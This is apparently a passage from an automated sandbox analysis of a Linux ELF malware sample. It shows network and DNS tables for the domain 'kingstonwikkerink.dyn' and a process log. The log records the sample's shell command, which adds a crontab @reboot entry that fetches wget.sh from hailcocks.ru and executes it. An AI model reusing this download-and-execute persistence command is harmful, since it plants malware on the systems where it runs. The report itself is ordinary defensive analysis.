                                                          Oct 24, 2024 14:29:19.291285038 CEST96924161688.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:29:19.596698046 CEST96924161688.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:29:19.596867085 CEST416169692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:29:36.858244896 CEST5672616227192.168.2.23185.82.200.181
                                                          Oct 24, 2024 14:29:36.864567041 CEST1622756726185.82.200.181192.168.2.23
                                                          Oct 24, 2024 14:29:37.105186939 CEST1622756726185.82.200.181192.168.2.23
                                                          Oct 24, 2024 14:29:37.105321884 CEST5672616227192.168.2.23185.82.200.181
                                                          Oct 24, 2024 14:30:39.647819996 CEST416169692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:30:39.653255939 CEST96924161688.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:30:39.958915949 CEST96924161688.151.195.22192.168.2.23
                                                          Oct 24, 2024 14:30:39.959074020 CEST416169692192.168.2.2388.151.195.22
                                                          Oct 24, 2024 14:30:57.161326885 CEST5672616227192.168.2.23185.82.200.181
                                                          Oct 24, 2024 14:30:57.167777061 CEST1622756726185.82.200.181192.168.2.23
                                                          Oct 24, 2024 14:30:57.407732010 CEST1622756726185.82.200.181192.168.2.23
                                                          Oct 24, 2024 14:30:57.407903910 CEST5672616227192.168.2.23185.82.200.181
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 24, 2024 14:27:48.568238974 CEST4953553192.168.2.2365.21.1.106
                                                          Oct 24, 2024 14:27:48.595432043 CEST534953565.21.1.106192.168.2.23
                                                          Oct 24, 2024 14:27:48.810818911 CEST3863153192.168.2.2365.21.1.106
                                                          Oct 24, 2024 14:27:48.838268995 CEST533863165.21.1.106192.168.2.23
                                                          Oct 24, 2024 14:27:54.829205036 CEST4302753192.168.2.23202.61.197.122
                                                          Oct 24, 2024 14:27:54.840143919 CEST5343027202.61.197.122192.168.2.23
                                                          Oct 24, 2024 14:28:00.811876059 CEST3468453192.168.2.23168.235.111.72
                                                          Oct 24, 2024 14:28:00.899835110 CEST5334684168.235.111.72192.168.2.23
                                                          Oct 24, 2024 14:28:06.531903982 CEST4272453192.168.2.23194.36.144.87
                                                          Oct 24, 2024 14:28:06.542402029 CEST5342724194.36.144.87192.168.2.23
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 24, 2024 14:27:48.568238974 CEST192.168.2.2365.21.1.1060x2a66Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.810818911 CEST192.168.2.2365.21.1.1060x2a66Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.829205036 CEST192.168.2.23202.61.197.1220xa56fStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.811876059 CEST192.168.2.23168.235.111.720x8af0Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.531903982 CEST192.168.2.23194.36.144.870x6085Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 24, 2024 14:27:48.595432043 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.595432043 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.595432043 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.595432043 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.595432043 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.595432043 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.595432043 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.595432043 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.595432043 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.595432043 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.595432043 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.838268995 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.838268995 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.838268995 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.838268995 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.838268995 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.838268995 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.838268995 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.838268995 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.838268995 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.838268995 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:48.838268995 CEST65.21.1.106192.168.2.230x2a66No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.840143919 CEST202.61.197.122192.168.2.230xa56fNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.840143919 CEST202.61.197.122192.168.2.230xa56fNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.840143919 CEST202.61.197.122192.168.2.230xa56fNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.840143919 CEST202.61.197.122192.168.2.230xa56fNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.840143919 CEST202.61.197.122192.168.2.230xa56fNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.840143919 CEST202.61.197.122192.168.2.230xa56fNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.840143919 CEST202.61.197.122192.168.2.230xa56fNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.840143919 CEST202.61.197.122192.168.2.230xa56fNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.840143919 CEST202.61.197.122192.168.2.230xa56fNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.840143919 CEST202.61.197.122192.168.2.230xa56fNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:27:54.840143919 CEST202.61.197.122192.168.2.230xa56fNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.899835110 CEST168.235.111.72192.168.2.230x8af0No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.899835110 CEST168.235.111.72192.168.2.230x8af0No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.899835110 CEST168.235.111.72192.168.2.230x8af0No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.899835110 CEST168.235.111.72192.168.2.230x8af0No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.899835110 CEST168.235.111.72192.168.2.230x8af0No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.899835110 CEST168.235.111.72192.168.2.230x8af0No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.899835110 CEST168.235.111.72192.168.2.230x8af0No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.899835110 CEST168.235.111.72192.168.2.230x8af0No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.899835110 CEST168.235.111.72192.168.2.230x8af0No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.899835110 CEST168.235.111.72192.168.2.230x8af0No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:00.899835110 CEST168.235.111.72192.168.2.230x8af0No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.542402029 CEST194.36.144.87192.168.2.230x6085No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.542402029 CEST194.36.144.87192.168.2.230x6085No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.542402029 CEST194.36.144.87192.168.2.230x6085No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.542402029 CEST194.36.144.87192.168.2.230x6085No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.542402029 CEST194.36.144.87192.168.2.230x6085No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.542402029 CEST194.36.144.87192.168.2.230x6085No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.542402029 CEST194.36.144.87192.168.2.230x6085No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.542402029 CEST194.36.144.87192.168.2.230x6085No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.542402029 CEST194.36.144.87192.168.2.230x6085No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.542402029 CEST194.36.144.87192.168.2.230x6085No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                          Oct 24, 2024 14:28:06.542402029 CEST194.36.144.87192.168.2.230x6085No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false

                                                          System Behavior

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/tmp/mpsl.elf
                                                          Arguments:/tmp/mpsl.elf
                                                          File size:5773336 bytes
                                                          MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/tmp/mpsl.elf
                                                          Arguments:-
                                                          File size:5773336 bytes
                                                          MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/bin/sh
                                                          Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                          File size:129816 bytes
                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/bin/sh
                                                          Arguments:-
                                                          File size:129816 bytes
                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/bin/sh
                                                          Arguments:-
                                                          File size:129816 bytes
                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/usr/bin/crontab
                                                          Arguments:crontab -l
                                                          File size:43720 bytes
                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/bin/sh
                                                          Arguments:-
                                                          File size:129816 bytes
                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/usr/bin/crontab
                                                          Arguments:crontab -
                                                          File size:43720 bytes
                                                          MD5 hash:66e521d421ac9b407699061bf21806f5

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/tmp/mpsl.elf
                                                          Arguments:-
                                                          File size:5773336 bytes
                                                          MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/tmp/mpsl.elf
                                                          Arguments:-
                                                          File size:5773336 bytes
                                                          MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/tmp/mpsl.elf
                                                          Arguments:-
                                                          File size:5773336 bytes
                                                          MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/tmp/mpsl.elf
                                                          Arguments:-
                                                          File size:5773336 bytes
                                                          MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

                                                          Start time (UTC):12:27:47
                                                          Start date (UTC):24/10/2024
                                                          Path:/tmp/mpsl.elf
                                                          Arguments:-
                                                          File size:5773336 bytes
                                                          MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9